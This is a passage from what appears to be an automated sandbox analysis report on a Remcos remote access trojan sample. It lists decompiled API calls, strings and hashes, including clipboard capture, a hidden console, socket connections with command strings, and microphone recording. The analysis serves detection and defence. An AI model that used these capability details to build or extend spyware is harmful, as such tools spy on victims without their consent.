                                • Part of subcall function 0040EED4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,0040E644,?), ref: 0040EF01
                                • Part of subcall function 0040EED4: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,0040E644,?), ref: 0040EF09
                                • Part of subcall function 0040EED4: ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,00000000,?,?,0040E644,?), ref: 0040EF14
                                • Part of subcall function 0040EED4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0040E644,?), ref: 0040EF1E
                                • Part of subcall function 0040EED4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF27
                                • Part of subcall function 0040EED4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF3F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040E64B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E654
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E661
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E66A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@D@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                              • String ID: .exe$http\shell\open\command
                              • API String ID: 1097156965-4091164470
                              • Opcode ID: 08a1c99976d7565a188055a544cab16fbeaa302825a2accc4baf47b801d316af
                              • Instruction ID: c33ef1c1da018883c7c7ab6d04285324c3d84ed8a02606c642186c54a30d9d8b
                              • Opcode Fuzzy Hash: 08a1c99976d7565a188055a544cab16fbeaa302825a2accc4baf47b801d316af
                              • Instruction Fuzzy Hash: EF11F17190011EABDF04EBE0DC4DFEE7778FB14305F444469F512A21A1EEB8A548CB58
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,76F90F00,?,?,?,?,?,00404196), ref: 00405168
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,004156A8,?,?,00000000,76F90F00,?,?,?,?,?,00404196), ref: 0040518E
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00404196), ref: 004051A0
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668,?,?,?,00404196), ref: 004051AF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],004156A8,[End of clipboard text]), ref: 004051D1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 004051DB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 004051ED
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00404196), ref: 004051F6
                              Strings
                              • [Following text has been copied to clipboard:], xrefs: 004051CB
                              • [End of clipboard text], xrefs: 004051C5
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                              • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                              • API String ID: 1191203583-3441917614
                              • Opcode ID: 90c1c98ff18be6c2d4d3753f8e68d31aeb205785e0e6a9307077bf7a6d6592dc
                              • Instruction ID: 00a8ace4b862f7325ec407ea538c2c3054ea5e1f5129ba08377fdacfa38d8bab
                              • Opcode Fuzzy Hash: 90c1c98ff18be6c2d4d3753f8e68d31aeb205785e0e6a9307077bf7a6d6592dc
                              • Instruction Fuzzy Hash: 5911B731A002099BCB00E7A4ED4EEEF3B6CDB84315F10007BF405B2181DE788D89876D
                              APIs
                              • GetLocalTime.KERNEL32(?,76E50440,00415A30,6A41AFB0,?,?,?,?,?,?,?,?,?,?,?,0040A950), ref: 0040266B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Enabled! (Timeout: %i seconds),?,?,0040A950,?,?), ref: 00402697
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A950,?), ref: 004026A2
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A950,?), ref: 004026AC
                              • printf.MSVCRT ref: 004026B3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C8
                              • CreateThread.KERNEL32(00000000,00000000,00402823,00415A30,00000000,00000000), ref: 004026DF
                              Strings
                              • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402692
                              • Enabled! (Timeout: %i seconds), xrefs: 0040268C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                              • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Enabled! (Timeout: %i seconds)
                              • API String ID: 3715082883-3146830426
                              • Opcode ID: 3a9708a68446399abd0b795bd19e37fdc65d9098a2dc3f9d79772d21f0b7afde
                              • Instruction ID: 79c03f263a9eabdf1fe5f6b3bc6f9ebe40ce7b552af33f5414839a7309894a53
                              • Opcode Fuzzy Hash: 3a9708a68446399abd0b795bd19e37fdc65d9098a2dc3f9d79772d21f0b7afde
                              • Instruction Fuzzy Hash: F01186B2501218BFCB509BE4DD8DCFFB7BCAA44714B004477F542A2190DAB9A984C778
                              APIs
                              • AllocConsole.KERNEL32(76F90F10,00000000,00415940), ref: 0040FAF9
                              • GetConsoleWindow.KERNEL32 ref: 0040FAFF
                              • ShowWindow.USER32(00000000,00000000), ref: 0040FB13
                              • freopen.MSVCRT ref: 0040FB2C
                              • printf.MSVCRT ref: 0040FBD5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: ConsoleWindow$AllocShowfreopenprintf
                              • String ID: * Breaking-Security.Net$ * REMCOS v$1.7 Pro$CONOUT$
                              • API String ID: 758035570-4154014664
                              • Opcode ID: 85a77a9c2555b3fe81e500512262144cb936832edbba782d647d7bbe067822b6
                              • Instruction ID: 2f2b88ad7b218c54194607ff57f3a4bae2920d7697a65db163e517dfa2cb7a2b
                              • Opcode Fuzzy Hash: 85a77a9c2555b3fe81e500512262144cb936832edbba782d647d7bbe067822b6
                              • Instruction Fuzzy Hash: 6D212832B0020C1BCB299B7DDCA45EE7A9BA7C4251B94817EF90BD73D0DEB04D888608
                              APIs
                                • Part of subcall function 00408150: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040815E
                                • Part of subcall function 00408150: LoadResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408169
                                • Part of subcall function 00408150: LockResource.KERNEL32(00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408170
                                • Part of subcall function 00408150: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 0040817B
                              • malloc.MSVCRT ref: 00407C76
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00407CA2
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407CAE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407CB7
                              • malloc.MSVCRT ref: 00407CC8
                                • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                • Part of subcall function 00402A2A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                • Part of subcall function 00402A2A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                              • free.MSVCRT(?,?,?,?,dt@,00000000), ref: 00407D13
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407D21
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407D2A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                              • String ID: dt@
                              • API String ID: 531887698-2366654348
                              • Opcode ID: 986cc1e09f076ae00b03e92c541cff929956ae5efa4b9e40f25a22f0709455da
                              • Instruction ID: e7c362bbf55d6fe362def41f57b44465b4cf4643257c8798677b0b7ff2d7c4a4
                              • Opcode Fuzzy Hash: 986cc1e09f076ae00b03e92c541cff929956ae5efa4b9e40f25a22f0709455da
                              • Instruction Fuzzy Hash: 7F310776A00009EFCF04DBA4D9999EEBBB9FB48315F1041A9E906A3290DA746E48DB54
                              APIs
                                • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,funready,00415268,00000000,?,?,?,00415988), ref: 004060A9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 004060C5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415988), ref: 004060B3
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,getfunlib,00415268,00000000,?,?,?,00415988), ref: 004060EC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415988), ref: 004060F6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 00406108
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988), ref: 00406111
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$?c_str@?$basic_string@?length@?$basic_string@V01@@V10@0@V10@@$D@1@@connectsocket
                              • String ID: funready$getfunlib
                              • API String ID: 325875447-1077912798
                              • Opcode ID: 5fa60852b65b47e2a6ed33d628b531b91edfa84125d12b179fb2feb604901ce3
                              • Instruction ID: 70f68d2a33a774611a59a187b4e42018cf206f473d21f4c0636caec103ff2ad2
                              • Opcode Fuzzy Hash: 5fa60852b65b47e2a6ed33d628b531b91edfa84125d12b179fb2feb604901ce3
                              • Instruction Fuzzy Hash: A011A571A40615A6DB04B7B1AC4BDFF726CAA85304F04093EF901761C2E9BC5958466D
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76E50440,00415268,?,?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E6CA
                              • time.MSVCRT ref: 0040E6E2
                              • srand.MSVCRT ref: 0040E6EF
                              • rand.MSVCRT ref: 0040E703
                              • rand.MSVCRT ref: 0040E717
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E72A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00408716,?), ref: 0040E73A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408716,?), ref: 0040E743
                              Strings
                              • abcdefghijklmnopqrstuvwxyz, xrefs: 0040E6D2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                              • String ID: abcdefghijklmnopqrstuvwxyz
                              • API String ID: 3357298394-1277644989
                              • Opcode ID: 61b4d72e65c601405d3fc08df9816bbbc004d5cb0974ce55ff798480f3e55148
                              • Instruction ID: 1fb110d2ec9980bb9f4c5b47183564c597e57a5cf9685dcf05f4e26dd2d8a7df
                              • Opcode Fuzzy Hash: 61b4d72e65c601405d3fc08df9816bbbc004d5cb0974ce55ff798480f3e55148
                              • Instruction Fuzzy Hash: 6311CC7750011D9BCB04EBA1ED49AEF7B78EB40311F104436F901971D0DA7A9945CB68
                              APIs
                              • GetLocalTime.KERNEL32(?,76E50440,00415A30,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040271B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040A946,?,?), ref: 00402747
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 00402752
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040275C
                              • printf.MSVCRT ref: 00402763
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040276F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402778
                              Strings
                              • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402742
                              • Timeout changed to %i, xrefs: 0040273C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                              • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout changed to %i
                              • API String ID: 1710008465-867111061
                              • Opcode ID: 808450fb4774ad14a115e835dc756668e8b689d331a4670f9e89f49d9f85dff4
                              • Instruction ID: cc00f5fe8abc897b27b5181be741a8fd0fdef4b4223a36fb38de5ceb1cc1b4cc
                              • Opcode Fuzzy Hash: 808450fb4774ad14a115e835dc756668e8b689d331a4670f9e89f49d9f85dff4
                              • Instruction Fuzzy Hash: 16117B72800214BBCB509BE5DD4DEEFB7BCBB44715F144477F442A2190D6B8A584CB68
                              APIs
                              • GetLocalTime.KERNEL32(?,00415A30,?,?,?,?,?,?,?,?,?,?,?,?,004022CD,00000001), ref: 004027B2
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Disabled.,?,?,?,?), ref: 004027DD
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004022CD,00000001), ref: 004027E8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004022CD), ref: 004027F2
                              • printf.MSVCRT ref: 004027F9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402805
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040280E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                              • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Disabled.
                              • API String ID: 1710008465-2552289483
                              • Opcode ID: 3267047b5620e5403b2cf5c74a9a0aa7daad7e6dba77e29f4ce0e4a6586bfbfa
                              • Instruction ID: 26824cefd2d391b63e7f360a9efe5498c18b65437e815fb1cf45070ddafa23bd
                              • Opcode Fuzzy Hash: 3267047b5620e5403b2cf5c74a9a0aa7daad7e6dba77e29f4ce0e4a6586bfbfa
                              • Instruction Fuzzy Hash: FE11A176800218BBCF50EBE4DD0D8EE77BCAA45300B008577F842A21D1DAB89A88C779
                              APIs
                              • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                              • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                              • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@$??1?$basic_string@D@1@@V01@@
                              • String ID: hRA$hRA
                              • API String ID: 2647928144-3777161688
                              • Opcode ID: 70c260e072eb46f2d6d8b5b222665c27e8336ff8b799b378cd1156fa49a8c359
                              • Instruction ID: 2d0384a5b8d7644f76aacc237b36b5e03aa9b3646a5a52e53ad8478f9338e915
                              • Opcode Fuzzy Hash: 70c260e072eb46f2d6d8b5b222665c27e8336ff8b799b378cd1156fa49a8c359
                              • Instruction Fuzzy Hash: 92011A35600109ABCB04EBA8E89D8EE77B9FB84251B408179F907D7290DBB09E49CB64
                              APIs
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(?,00000000,6A41AFB0,?,?,0040E644,?), ref: 0040EEE3
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,0040E644,?), ref: 0040EF01
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,0040E644,?), ref: 0040EF09
                              • ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,00000000,?,?,0040E644,?), ref: 0040EF14
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0040E644,?), ref: 0040EF1E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF27
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0040E644,?), ref: 0040EF36
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,0040E644,?), ref: 0040EF3F
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@D@1@@V12@
                              • String ID: D@
                              • API String ID: 3577381420-217608370
                              • Opcode ID: 64957e4059d4a5a3af3f2383b2cb762eef85518bada7f33c27665136f667c68a
                              • Instruction ID: d4362ae4465ef3a6c70cc0c136aafbc0d12dcd70d9c8d064c5fd94e1c76eb894
                              • Opcode Fuzzy Hash: 64957e4059d4a5a3af3f2383b2cb762eef85518bada7f33c27665136f667c68a
                              • Instruction Fuzzy Hash: 4E01A53550011EEFCF049F64EC9C9EA7B79FB44315B108464FC16972A0DB78AE55CB58
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040188D
                              • CreateDirectoryA.KERNEL32(00000000), ref: 00401894
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 004018E2
                              • atoi.MSVCRT ref: 004018E9
                              • waveInOpen.WINMM(004151D0,000000FF,004151D8,004019AA,00000000), ref: 0040192C
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 0040193F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401947
                              • waveInPrepareHeader.WINMM(00415160,00000020), ref: 00401982
                              • waveInAddBuffer.WINMM(00415160,00000020), ref: 00401991
                              • waveInStart.WINMM ref: 0040199D
